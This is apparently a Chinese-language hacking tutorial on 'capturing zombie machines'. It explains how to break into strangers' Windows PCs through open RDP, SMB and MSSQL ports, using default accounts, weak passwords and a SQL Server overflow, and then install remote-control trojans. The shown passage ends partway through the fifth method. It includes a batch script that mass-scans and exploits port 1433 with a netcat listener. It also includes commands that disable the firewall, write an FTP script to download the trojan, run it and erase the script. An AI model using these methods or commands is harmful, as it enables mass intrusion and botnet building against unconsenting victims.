抓鸡方法思路心得.doc

抓鸡方法思路心得 最快最有效的12种抓鸡方法思路心得,首先得准备，免杀的STAT 或 一只免杀鸽子或者其他的远控，一个免费空间，一些工具(下面会提到) 　　(1)扫3389端口抓肉鸡(适合新手)(抓不了国外肉鸡) 　　现在国内网络上流传着一种克隆版的XP，安装后会默认开启一个账号为new,密码为空的账户，而且基本上都是开着3389的，我们就可以利用这一点来抓肉鸡。首先用端口扫描工具(如S扫)扫一段IP的3389端口，扫完后就直接用远程桌面连接开放3389的机器(也可以把结果保存为文本文件，用批量生成3389连接的工具来连接)，然后输入账号new登入，如果别人的电脑前没人的话你就可以去你的空间下载你传好的木马安装拉~~这种方法只针XP系统，如果遇到2000或者2003系统就不要试了呵呵。缺点也很明显，如果别人不是用new账号登入XP的，你再登入上去就会把他挤出去(XP只支持单用户登入，用户登入需要用工具开)，或者电脑前有人你就不可能去打开IE下载木马了。 　　(2)扫135端口抓肉鸡 　　首先先用端口扫描器扫一段IP的135端口，然后把结果保存，再用NTSCAN过滤有弱口令的机器，最后用recton开telnet传马。因为现在135和445端口都被防火墙屏蔽了，只能扫本地的135肉鸡，要抓外地的只能用外地的135肉鸡来扫。(详细动画可以去黑客网站搜索135) 　　(3)扫445端口抓肉鸡 　　和扫135抓肉鸡差不多，首先先用端口扫描器扫一段IP的445端口，然后把结果保存，再用NTSCAN过滤有弱口令的机器，最后用啊D工具包开共享传马。因为现在135和445端口都被防火墙屏蔽了，只能扫本地的445肉鸡，要抓外地的只能用外地的445肉鸡来扫。(详细动画可以去黑客网站搜索445) 　　(4)1433端口批量溢出抓肉鸡 　　这个方法可以实现全自动抓鸡，不过现在太多人搞，成功率已经不高了。 　　要用到的工具：S扫 sqlhello.exe nc.exe 批处理文件 　　首先先写个批处理，打开记事本，把以下代码复制修改后，储存为扫描+溢出.bat文件 　　@echo off 　　for /f eol=; tokens=1,2 delims= %%i in (tt.txt) do s.exe tcp %%i %%j 1433 1000 /save 　　@echo off 　　for /f eol=; tokens=1 delims= %%i in (Result.txt) do sqlhello %%i 1433 xxx.xxx.xx.xx 556 　　还要新建一个tt.txt，里面你要扫的IP段，格式为XXX.XXX.XXX.XXX XXX.XXX.XXX.XXX,中间是空格 　　1433是要扫描的端口，1000是扫描线程数 ，do sqlhello %%i 1433 xxx.xxx.xx.xx 556 这个里的XXX添你的IP，556是后面NC监听的端口 　　然后再写个批处理 　　@echo off 　　Nc -l -vv -p 556 　　然后再新建一个nc.txt,里面填写溢出成功后让肉鸡下载你木马的代码。 　　这里给出一种代码 　　echo open X.X.X.X(你FTP的IP)daima.txt 　　echo usernamedaima.txt 　　echo passworddaima.txt 　　echo bindaima.txt(以2进制传输数据) 　　echo get xxx.exe(你的木马的文件名,要放在根目录下)daima.txt 　　echo byedaima.txt 　　net stop sharedaccess(关闭WINDOWS自带防火墙) 　　ftp -s:daima.txt 　　xxx.exe(也是填你木马的文件名) 　　del daima.txt 　　注意上面的代码回车符别删掉，要不然就没法下你的马了。 　　更多的代码去/2005/0731/20050731019501.shtml这里看 　　上面的步骤都搞好后，就可以开始扫肉鸡了。 　　先打开多个NC.bat,然后再打开扫描+溢出.bat,然后你就可以去睡大觉了。自动扫描，扫描完后自动溢出，溢出后还自动下马执行，爽吧!所以这里讲详细点，呵呵。还有42 21端口也可以这样溢出，只要用这些端口的溢出工具就好了，详细动画可以去黑客网站搜索1433。 　　忘了说，上面的工具和批处理什么的都要放在同一个文件夹下。 　　先休息一下，打这么多字累死了 　　继续 　　(5)扫1433抓肉鸡之方法2 　　要用到的工具：端口扫描器 X-scan SQL综合利用工具 　　上面我们说过了，1433溢出现在成功率已经不高了，所以我们可以用另一种方法。 　　开了1433端